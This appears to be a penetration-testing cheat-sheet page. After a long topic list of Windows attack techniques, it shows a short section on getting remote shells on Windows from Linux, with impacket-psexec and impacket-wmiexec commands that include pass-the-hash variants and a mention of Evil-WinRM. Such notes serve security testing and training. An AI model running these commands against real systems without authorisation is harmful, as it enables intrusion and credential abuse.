Exploits related to Windows

Active Directory

AD CS (Active Directory Certificate Services) Pentesting

AS-REP Roasting

Active Directory Pentesting

BloodHound SharpHound for Active Directory

Kerberos Pentesting

LAPS (Local Administrator Password Solution) Pentesting

LDAP (Lightweight Directory Access Protocol) Pentesting

LDAP Injection

NTLM (New Technology LAN Manager) Pentesting

Netlogon Elavasion of Privilege

SMB (Server Message Block) Pentesting

Protocol

MSRPC (Microsoft Remote Procedure Call) Pentesting

RDP (Remote Desktop Protocol) Pentesting

WinRM (Windows Remote Management) Pentesting

Privilege Escalation

Iperius Backup Service Privilege Escalation

ManageEngine ADSelfService Plus PrivEsc

Mimikatz

Outlook Reminder Privilege Escalation

UAC Windows Privilege Escalation

Windows PrivEsc with Potatoes

Windows PrivEsc with Registry Keys

Windows PrivEsc with SeBackupPrivilege

Windows PrivEsc with Unquoted Service Path

Windows Privilege Escalation

Post Exploitation

Windows Pivoting

PowerShell

PowerShell

PowerView

Others

Dumping Windows Password Hashes

LocalPotato

M365 (Microsoft Office 365) Pentesting

Microsoft Outlook Message (.msg)

Microsoft Word Pentesting

Reading OneDrive Logs

WSL Pentesting

Windows API

Windows Disk Management

Windows Forensics

Windows Memory Dump Analysis

Windows Pivoting

Windows Print Spooler Service

Windows Remote Code Execution from Linux

Windows XML EventLog (EVTX)

Windows Remote Code Execution from Linux

Last modified: 2023-02-08

RCE Windows

If we have credentials for target Windows system, we can execute commands from Linux machine.

Getting into an Interactive Shell

Impacket PsExec

PsExec gives us an interactive shell on the Windows host.

impacket-psexec username:password@<target-ip>
# Pass the Hashes
impacket-psexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d username@10.0.0.1

Impacket WmiExec

WmiExec uses Windows Management Instrumentation (WMI) to give us an interactive shell on the Windows host.

impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hashes
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1

Evil-WinRM

Also we can use Evil-WinRM if the target Windows host uses/opens the WinRM (Windows Remote Management).

Tools by HDKS

Automatic web fuzzer.

Auto reconnaissance CLI.

Hash identifier.